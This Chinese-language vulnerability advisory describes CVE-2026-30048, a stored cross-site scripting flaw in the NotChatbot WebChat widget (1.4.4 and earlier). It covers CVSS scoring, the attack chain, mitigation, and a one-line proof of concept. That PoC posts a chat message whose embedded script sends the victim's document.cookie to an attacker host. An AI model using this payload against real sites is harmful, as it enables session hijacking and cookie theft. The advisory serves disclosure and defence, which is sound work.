CVE-2026-30048 CVSS 5.4 中危

CVE-2026-30048 NotChatbot WebChat 存储型跨站脚本漏洞

披露日期: 2026-03-18

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-30048

漏洞类型

存储型XSS

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

NotChatbot WebChat widget (≤1.4.4)

漏洞概述

NotChatbot WebChat widget 1.4.4及之前版本存在存储型跨站脚本(XSS)漏洞。该漏洞源于用户输入在存储和渲染到聊天会话历史时未进行充分的 sanitization 处理。攻击者可通过在聊天框中注入恶意JavaScript代码，当其他用户重新加载聊天历史时执行任意脚本。漏洞可在多个独立实现中复现，表明问题出在产品本身而非特定网站配置。攻击者可窃取会话Cookie、劫持用户会话、进行钓鱼攻击或修改页面内容。CVSS 3.1评分5.4属于中危级别，需要认证用户权限但可远程利用。

技术细节

该漏洞位于NotChatbot WebChat widget的消息处理模块。攻击者提交包含<script>标签或事件处理器(如onerror、onload)的恶意消息时，系统未对其进行HTML转义或内容安全策略(CSP)验证，直接存入数据库。当其他用户查看聊天历史时，这些未经过滤的内容被重新渲染到页面中，导致JavaScript代码在受害者浏览器执行。

攻击链分析

STEP 1

攻击者在WebChat中发送包含恶意脚本的消息

STEP 2

服务器存储消息但未进行sanitization

STEP 3

受害者查看聊天历史

STEP 4

恶意脚本在受害者浏览器执行，窃取敏感信息

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

fetch('https://notchatbot.example.com/api/messages', {method: 'POST', headers: {'Content-Type': 'application/json', 'Authorization': 'Bearer <token>'}, body: JSON.stringify({message: '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>'})});

影响范围

NotChatbot WebChat widget <= 1.4.4

防御指南

临时缓解措施

如果无法立即升级，可临时禁用WebChat widget或限制消息长度

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表